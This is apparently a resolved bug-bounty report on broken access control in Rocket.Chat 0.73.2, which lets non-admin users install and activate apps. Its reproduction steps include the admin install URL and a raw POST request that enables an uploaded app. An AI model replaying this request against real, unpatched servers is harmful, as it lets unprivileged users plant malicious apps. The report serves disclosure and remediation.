Broken access control on apps
Critical
R
Rocket.Chat
Submitted None
Actions:
Reported by
theappsec
Vulnerability Details
Technical details and impact analysis
**Summary:**
The user without administrative privileges can upload and install any Application into the rocket.chat
As ID of application is controlled in the app.json file (which is controlled by uploader) user can also activate the app.
## Releases Affected:
* 0.73.2
## Steps To Reproduce:
- User log-in into the chat
- User open the following link:
```
http://<rocket-chat.link>>/admin/app/install
```
- Upload any app
- Activate it by send the following POST request to the installed app:
```http
POST /api/apps/<ID_of_the_installed_App>/status HTTP/1.1
Host: rocket-chat.link
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-User-Id: [redacted]
X-Auth-Token: [redacted]
X-Requested-With: XMLHttpRequest
Cookie: [redacted]
DNT: 1
Connection: close
Content-Length: 29
{"status":"manually_enabled"}
```
## Supporting Material/References:
You can see the uploading process in the attached video. Left user is admin, right - user without any additional privileges.
## Suggested mitigation
Managing apps should be available to admins only.
## Impact
Users can install and activate malicious apps into the rocket.chat.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Improper Access Control - Generic